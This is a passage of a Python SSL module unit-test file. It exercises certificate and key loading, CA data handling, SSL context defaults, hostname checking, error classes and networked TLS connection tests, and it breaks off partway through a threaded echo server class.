ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegexp(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegexp(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegexp(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
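# The password argument accepted by load_cert_chain() may be a str, bytes or
# bytearray, or a callable returning one of those; passwords longer than
# OpenSSL's PEM buffer (roughly 1 KB) are rejected, and the callback is not
# invoked at all when the key is not encrypted, as exercised above.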
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError):
ctx.load_verify_locations(u'')
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read().decode("ascii")
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read().decode("ascii")
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata=u"broken")
with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
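# cadata accepts either PEM text (a unicode string, possibly with junk around
# the certificates) or DER bytes; certificates already present in the store
# are silently skipped, which is why the counts above stay at 2.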
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(IOError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build") # gevent run on 2.7.8
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
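# cert_store_stats() reports how many objects of each kind are in the verify
# store ('x509', 'x509_ca', 'crl'); load_cert_chain() configures the context's
# own certificate and does not touch the verify store, hence the unchanged
# counts after the first call above.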
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read().decode("ascii")
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
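# check_hostname can only be enabled together with CERT_REQUIRED or
# CERT_OPTIONAL, and verify_mode cannot be reset to CERT_NONE while hostname
# checking is still enabled; the two settings are deliberately coupled.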
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
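# The loop above is the canonical non-blocking handshake pattern: call
# do_handshake() until it succeeds, waiting for readability on
# SSLWantReadError and for writability on SSLWantWriteError;
# test_non_blocking_handshake below uses the same idiom against an
# already-connected socket.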
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read().decode('ascii')
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
s.connect(remote)
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
with closing(socket.socket(socket.AF_INET)) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with closing(ctx1.wrap_socket(s)) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except socket.error as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
